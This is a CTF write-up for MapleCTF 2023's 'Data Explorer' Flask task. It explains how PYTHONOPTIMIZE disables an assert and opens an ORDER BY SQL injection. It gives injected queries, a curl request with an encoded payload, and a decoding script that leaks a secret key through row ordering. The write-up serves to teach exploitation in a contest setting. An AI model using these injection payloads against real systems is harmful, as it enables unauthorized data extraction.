MapleCTF 2023 - Data Explorer
Overview
The task includes:
a link to the webpage with a bunch of features:
uploading a CSV file,
displaying a CSV file,
querying the uploaded data with a custom ordering and filtering for columns
a source code that consists of:
`server.py` - a Flask server,
`run.sh` - the bash script that runs an HTTP server with the app,
a directory with templates.
When we upload and display the file, we can see that the app runs in demo mode, so we can assume that the goal of the task is to get the license key for a CSV file.
Source code
server.py
First, we take a closer look at `server.py` to confirm our hypothesis about the license key. The function `upgrade` returns the flag if the key is correct.
render_template("upgrade.html", flag=os.environ.get("FLAG", "no flag found - contact admin!"))
`server.py` defines most of the application. As a default, it serves the `index.html` where we can upload a file. When the user creates a CSV file, it makes a `POST` request to the `create` endpoint, where many interesting things happen!
First, it initiates the `Database` class that creates a SQLite database. It has three methods, `create_table`, `insert_row` and `select_from`, which execute the SQL queries with the potential for some SQL injection. The code parses the CSV file and creates a SQL table called `data`. The code also creates a second table, `license`, with a license key. It is a 128-byte long string. The key is converted to a hexadecimal value of 256 characters long and consists of values 0-9 and a-f:
key = os.urandom(128).hex()
Next, we are redirected to the view defined by the function `view`. It displays the table. In the UI we can define filters and ordering for columns:
The form is submitted using POST method if we click the `Perform button`. The defined `filters` and `orders` are extracted from the request. For example:
orders = list(zip(request.form.getlist("order-col"), request.form.getlist("order-od")))
Next, the function tries to fetch the table `data` with requested filters and orders:
data = table.database.select_from("data", db_filters, db_orders)
The function constructs the select query and adds `filters` and `orders`.
query = "SELECT * FROM %s" % quote_identifier(table_name)
params = []
if filters:
query += " WHERE %s" % " AND ".join(format_filter(f) for f in filters)
params = [convert_value(f[2]) for f in filters]
if orders:
query += " ORDER BY %s" % ", ".join(format_order(f) for f in orders)
return self.db.execute(query, params).fetchall()
Functions `format_filter` and `format_order` check the values of actions like above for `orders`. The code asserts if `direction` is equal to ‘ASC’ or `DESC`, so it may not be possible to inject custom values.
def format_order(order: tuple[str, str]) -> str:
col_name, direction = order
assert direction.upper() in ["ASC", "DESC"]
return "%s %s" % (quote_identifier(col_name), direction)
But what about the column name? It is also consistently quoted with the function `quote_identifier`.
run.sh
It is a short script that runs the server with the app and creates an environment variable with the flag, but what is: `PYTHONOPTIMIZE=1` flag? Let’s google it. As a first query result, we can see the StackOverflow question:
As we’ve just learnt, this Python optimization disables `assert`. However, it also wisely says that ‘one shouldn’t use `assert` for things that could still go wrong in production’. Well, it means that our previous observation about injecting the code to the `orders` part of the query is valid as `assert` doesn’t check if the action is `ASC` or `DESC`. The only other assert (in `filters`) does unfortunately not present an opportunity for injection.
Solution
Query injection
We can inject SQL to code to order part:
if orders:
query += " ORDER BY %s" % ", ".join(format_order(f) for f in orders)
It means injected code has to be a valid part of the SQL query, which excludes many possible options. For example, the below code gives a syntax error because after `order by` only keyword, `limit` is valid.
`sqlite> select * from a order by x cross join (select * from b);
Error: near "cross": syntax error`
However, `order by` also gives plenty of opportunity for leaking data from the results – an `order by` specifies a permutation of input rows. But will this allow us to leak enough bits?
Some math
Looking at the code, we have additional limits for `DEMO_QUERY_LIMIT` and `DEMO_ROW_LIMIT`, so maximally, we can do 2 queries with 200 rows each. Remember that the license key is randomized, so we cannot just perform the attack any number of times we want.
DEMO_QUERY_LIMIT = 2
DEMO_ROW_LIMIT = 200
Let’s check if, from a mathematical point of view, it’s possible to extract the license key with the above constraints:
the license key consists of 128 bytes equivalent to 1024 bits, which gives 2**1024 options,
the rows can be permuted 200! ways, which is around 2**1246,
Uff, 2**1024 < 2**1246, so at least the task is possible even with one query!
Leaking key using ORDER BY
Now we know that it’s possible to leak quite a bit of data just using the order of elements. But how to do it in practise? Let’s see.
We upload CSV data:
aaa, pos
a, 1
a, 2
a, 3
a, 4
a, 5
a, 6
The license key ‘231’ is generated.
And we execute the query:
select * from data order by aaa, substr(‘XYZ’ || key, 1) from license, pos;
Remark: The function `substr` concatenates ‘XYZ’ + ‘YZX’ (license key) and order by subtstr(string, beginning position, how many characters).
Ordering by this query is equivalent to inserting an additional column: `X Y Z Y Z X` and ordering by it and `pos`:
aaa, pos, additional column
a, 1, X
a, 2, Y
a, 3, Z
a, 4, Y
a, 5, Z
a, 6, X
First, we order by `additional column` and second by `pos`. The result query displays:
aaa, pos
a, 1
a, 6
a, 2
a, 4
a, 3
a, 5
We know that the first row represents number 1, so until we reach `(a, 2)`, all the row has hidden value `1`, so (a, 6) has a value `1`, and its position is 6. We can now reconstruct the “additional column” just based on the order of rows. Let’s add it to the data:
aaa, pos, additional column
a, 1, X
a, 6, X
a, 2, Y
a, 4, Y
a, 3, Z
a, 5, Z
Now we can remove (a, 1, 1), (a, 2, 2) and (a, 3, 3) and sort rest or rows according to query:
aaa, pos, additional column
a, 4, Y
a, 5, Z
a, 6, X
The `additional column` represents a license key! So that’s the idea of how to extract the license key.
Let’s continue
To solve the task, we need to extract 256 characters of a license key in 2 queries, which gives 128 characters per query. In both queries, we need to add hexadecimal markers: ‘0-9’+’a-f’, which is 16 characters long. So, in summary, every query will have 144 rows.
As a last obstacle, we need to avoid redirection after uploading a CSV file because displaying data counts as a first query.
def view(table_id: str):
…
with table.lock:
if table.queries_left > 0:
table.queries_left -= 1
We can avoid the first redirection in many ways. For example, we can do all queries with `curl` with flag blocking redirection. Personally, I uploaded a file using Chrome and blocked the address of the redirection with the Ublock Chrome extension, then used `curl` to fetch the `view` endpoint.
License key extraction
First, we prepare a CSV file file to upload while the redirection is blocked:
aaa, pos
a, 1
a, 2
…
a, 144
Then, construct the first and second queries and copy the bolded value to a curl request,
The first query:
select * from data order by aaa, substr('0123456789abcdef' || key, 1) from license`, pos;
The second query:
select * from data order by aaa ,(select substr('0123456789abcdef' || substr(key, 129, 128) from license), pos;
The command line executes the `curl` requests with the SQL query:
curl 'https://data-explorer.ctf.maplebacon.org/view/<file_id>' \
--data-raw 'order-col=aaa&order-od=%2C+%28select+substr%28%270123456789abcdef%27+%7C%7C+substr%28key%2C%20129%29%2C+pos%2C+1%29+from+license%29%2C+pos'
Next, with an inelegant Python script, recover the license key from the curl responses:
data = open('x.in', 'r').read()
data2 = data.replace('\t', '').replace('\n', '').split('a')[1:]
poss = [int(x) for x in data2]
abc = '0123456789abcdef'
print(len(abc))
index = 0
d = ['x']*128
print(d)
for pos in poss:
print(index, pos)
if index+1 == pos and index<=15:
index += 1
else:
d[pos-17] = abc[index-1]
print("".join(d))
Finally, we join the key, submit it and get a flag.
Let me know in the comments if you have any questions or if you’d like to see a solution to any other web CTF task!
Happy hacking! Bye!